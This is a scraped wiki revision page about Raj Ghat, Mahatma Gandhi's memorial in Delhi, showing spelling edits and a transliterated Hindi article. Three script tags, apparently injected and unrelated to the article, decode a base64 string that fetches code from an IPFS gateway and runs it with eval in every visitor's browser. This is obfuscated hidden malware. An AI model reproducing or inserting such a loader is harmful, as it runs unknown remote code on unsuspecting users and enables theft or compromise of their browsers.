Difference between revisions of "राज घाट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "श्रद्धांजली" to "श्रद्धांजलि")
m (Text replace - "फव्वारे" to "फ़व्वारे")
Line 5: Line 5:
 
*इस समाधि पर महात्मा गांधी के अंतिम शब्द हे राम उद्धृत हैं।  
 
*इस समाधि पर महात्मा गांधी के अंतिम शब्द हे राम उद्धृत हैं।  
 
*यह स्थान अब एक ख़ूबसूरत बाग़ का रूप ले चुका है।  
 
*यह स्थान अब एक ख़ूबसूरत बाग़ का रूप ले चुका है।  
*यहाँ पर ख़ूबसूरत फव्वारे और अनेक प्रकार के पेड़ लगे हुए हैं।  
+
*यहाँ पर ख़ूबसूरत फ़व्वारे और अनेक प्रकार के पेड़ लगे हुए हैं।  
 
*यहाँ पास ही शांति वन में भारत के पहले प्रधानमंत्री पंडित [[जवाहरलाल नेहरू]] की समाधि भी है।  
 
*यहाँ पास ही शांति वन में भारत के पहले प्रधानमंत्री पंडित [[जवाहरलाल नेहरू]] की समाधि भी है।  
 
*महात्मा गांधी को श्रद्धांजलि देने के लिए [[भारत]] आने वाले विदेशी उच्चाधिकारी राजघाट अवश्य आते हैं।
 
*महात्मा गांधी को श्रद्धांजलि देने के लिए [[भारत]] आने वाले विदेशी उच्चाधिकारी राजघाट अवश्य आते हैं।

Revision as of 14:00, 31 July 2014

[[chitr:Raj-Ghat-Delhi.jpg|thumb|250px|mahatma gaandhi smarak, rajaghat, dilli]]

  • dilli ek akarshak paryatan sthal hai.
  • yamuna nadi ke pashchimi kinare par mahatma gaandhi ki samadhi sthit hai.
  • yah samadhi kale sangamaramar se bani huee hai.
  • is samadhi par mahatma gaandhi ke aantim shabd he ram uddhrit haian.
  • yah sthan ab ek khoobasoorat bag ka roop le chuka hai.
  • yahaan par khoobasoorat favvare aur anek prakar ke pe d lage hue haian.
  • yahaan pas hi shaanti van mean bharat ke pahale pradhanamantri pandit javaharalal neharoo ki samadhi bhi hai.
  • mahatma gaandhi ko shraddhaanjali dene ke lie bharat ane vale videshi uchchadhikari rajaghat avashy ate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>